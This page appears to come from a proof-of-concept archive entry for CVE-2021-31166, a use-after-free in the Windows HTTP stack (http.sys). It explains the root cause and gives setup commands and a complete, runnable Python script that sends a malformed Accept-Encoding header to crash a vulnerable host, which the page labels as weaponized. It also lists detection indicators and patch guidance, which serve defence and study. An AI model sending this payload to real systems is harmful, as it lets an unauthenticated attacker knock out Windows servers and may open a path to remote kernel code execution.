PoC Archive PoC Archive
Critical CVE-2021-31166 patched

HTTP Protocol Stack Remote Code Execution Vulnerability (CVE-2021-31166)

by Axel "0vercl0k" Souchet (PoC); vulnerability reported by @_mxms and @fzzyhd1 · 2026-05-15

CVSS 9.8/10
Severity
Critical
CVE
CVE-2021-31166
Category
network
Affected product
Microsoft Windows HTTP Protocol Stack (http.sys)
Affected versions
Windows Server 2004/20H2 (Server Core) and Windows 10 2004/20H2 (ARM64/x64/32-bit), per Microsoft advisory
Disclosed
2026-05-15
Patch status
patched

Metadata

FieldValue
Date Added2026-05-15
Author / ResearcherAxel “0vercl0k” Souchet (PoC); vulnerability reported by @_mxms and @fzzyhd1
CVE / AdvisoryCVE-2021-31166
Categorynetwork
SeverityCritical
CVSS Score9.8 (CVSSv3.1)
StatusWeaponized
TagsHTTP.sys, use-after-free, RCE, Windows, kernel, unauthenticated
RelatedN/A

Affected Target

FieldValue
Software / SystemMicrosoft Windows HTTP Protocol Stack (http.sys)
Versions AffectedWindows Server 2004/20H2 (Server Core) and Windows 10 2004/20H2 (ARM64/x64/32-bit), per Microsoft advisory
Language / PlatformPython PoC targeting Windows HTTP.sys over HTTP
Authentication RequiredNo
Network Access RequiredYes

Summary

CVE-2021-31166 is a remote use-after-free vulnerability in the Windows HTTP Protocol Stack (http.sys) that is reachable via crafted HTTP headers. The public PoC sends a malformed Accept-Encoding header to trigger unsafe list handling in the kernel HTTP parser path. Successful exploitation can lead to system crash and has remote code execution impact according to Microsoft’s advisory.


Vulnerability Details

Root Cause

The vulnerable code path in http!UlpParseContentCoding mishandles list ownership for parsed content-coding entries. A local list is moved into the request structure, but stale list linkage can still be freed on another path, causing use-after-free / list corruption behavior.

Attack Vector

A remote, unauthenticated attacker sends an HTTP request containing a crafted Accept-Encoding value (for example with malformed comma-separated codings) to a Windows service that uses http.sys.

Impact

  • Remote kernel crash/denial-of-service (e.g., KERNEL_SECURITY_CHECK_FAILURE).
  • Potential remote code execution in the Windows kernel networking stack.
  • Exposure of internet-facing Windows services that rely on http.sys.

Environment / Lab Setup

OS:          Attacker on Linux/macOS/Windows with Python 3
Target:      Authorized vulnerable Windows 10/Windows Server host using HTTP.sys
Attacker:    Any host with TCP connectivity to target HTTP service
Tools:       python3, requests

Setup Steps

1
2
3
4
5
cd pocs/network/2026-05-15_cve-2021-31166-http-sys-uaf
python3 -m venv .venv
source .venv/bin/activate
pip install requests
python3 cve-2021-31166.py --target 192.0.2.10:80

Proof of Concept

Step-by-Step Reproduction

  1. Prepare an authorized vulnerable Windows system exposing an HTTP endpoint backed by http.sys.
  2. From an attacker machine, run the PoC with --target <ip:port>.
  3. The PoC sends a GET request with a crafted Accept-Encoding header.
  4. Observe target instability/crash in vulnerable environments.

Exploit Code

See cve-2021-31166.py in this folder.

1
2
3
4
5
6
import requests

target = "192.0.2.10:80"
requests.get(f"http://{target}/", headers={
    "Accept-Encoding": "doar-e, ftw, imo, ,",
})

Expected Output

<Response [400]>

Screenshots / Evidence

  • screenshots/ — add authorized lab packet capture, request trace, and crash evidence.

Detection & Indicators of Compromise

- Repeated malformed Accept-Encoding headers such as trailing empty codings
- Sudden HTTP service disruption followed by host bugcheck/reboot
- Kernel crash signatures involving HTTP!UlFreeUnknownCodingList / UlpParseAcceptEncoding

SIEM / IDS Rule (example):

Alert on inbound HTTP requests where Accept-Encoding contains malformed trailing
commas/empty coding tokens and correlate with HTTP service crashes.

Remediation

ActionDetail
PatchApply Microsoft May 2021 security updates for CVE-2021-31166
WorkaroundRestrict exposure of HTTP.sys-backed services and filter malformed headers at edge controls
Config HardeningSegment critical Windows hosts, enable crash monitoring, and maintain rapid patch cadence

References


Notes

Auto-ingested from https://github.com/0vercl0k/CVE-2021-31166 on 2026-05-15.

cve-2021-31166.py
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
# For authorized security research and educational use only.
# Do not use against systems or networks without explicit permission.

# Axel '0vercl0k' Souchet - May 16 2021
import requests
import argparse

def main():
    parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
    parser.add_argument('--target', required = True)
    args = parser.parse_args()
    r = requests.get(f'http://{args.target}/', headers = {
        'Accept-Encoding': 'doar-e, ftw, imo, ,',
    })
    print(r)

main()